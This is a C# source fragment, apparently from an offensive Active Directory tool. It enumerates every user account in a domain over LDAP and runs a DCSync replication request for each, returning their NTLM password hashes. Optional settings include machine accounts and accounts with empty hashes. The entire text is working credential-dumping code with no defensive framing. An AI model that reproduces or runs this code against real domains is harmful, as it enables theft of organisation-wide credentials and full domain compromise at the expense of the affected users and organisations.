public static IEnumerable <string> DcSyncHashDump(DcSyncAllSettings settings)
{
foreach (var record in DcSyncAll(settings))
{
yield return(record.HashString);
}
}
public static IEnumerable <SyncRecord> DcSyncAll(DcSyncAllSettings settings)
{
if (User.IsSystem())
{
throw new InvalidOperationException("Current session is running as SYSTEM, dcsync won't work.");
}
System.Diagnostics.Debug.Write("[PSH BINDING - DCSYNCALL] User is not running as SYSTEM.");
if (string.IsNullOrEmpty(settings.Domain))
{
settings.Domain = System.DirectoryServices.ActiveDirectory.Domain.GetComputerDomain().Name;
}
if (string.IsNullOrEmpty(settings.Domain))
{
throw new ArgumentException("Domain parameter must be specified.");
}
System.Diagnostics.Debug.WriteLine("[PSH BINDING - DCSYNCALL] Running against domain " + settings.Domain);
using (var adRoot = new System.DirectoryServices.DirectoryEntry(string.Format("LDAP://{0}", settings.Domain)))
using (var searcher = new System.DirectoryServices.DirectorySearcher(adRoot))
{
searcher.SearchScope = System.DirectoryServices.SearchScope.Subtree;
searcher.ReferralChasing = System.DirectoryServices.ReferralChasingOption.All;
searcher.Filter = "(objectClass=user)";
searcher.PropertiesToLoad.Add("samAccountName");
using (var searchResults = searcher.FindAll())
{
System.Diagnostics.Debug.WriteLine("[PSH BINDING - DCSYNCALL] Search resulted in results: " + searchResults.Count.ToString());
foreach (System.DirectoryServices.SearchResult searchResult in searchResults)
{
if (searchResult != null)
{
var username = searchResult.Properties["samAccountName"][0].ToString();
System.Diagnostics.Debug.WriteLine("[PSH BINDING - DCSYNCALL] Found account: " + username);
if (settings.IncludeMachineAccounts || !username.EndsWith("$"))
{
var record = DcSync(string.Format("{0}\\{1}", settings.Domain, username), settings.DomainController, settings.DomainFqdn);
if (record != null && (settings.IncludeEmpty || !string.IsNullOrEmpty(record.NtlmHash)))
{
yield return(record);
}
}
}
}
}
}
}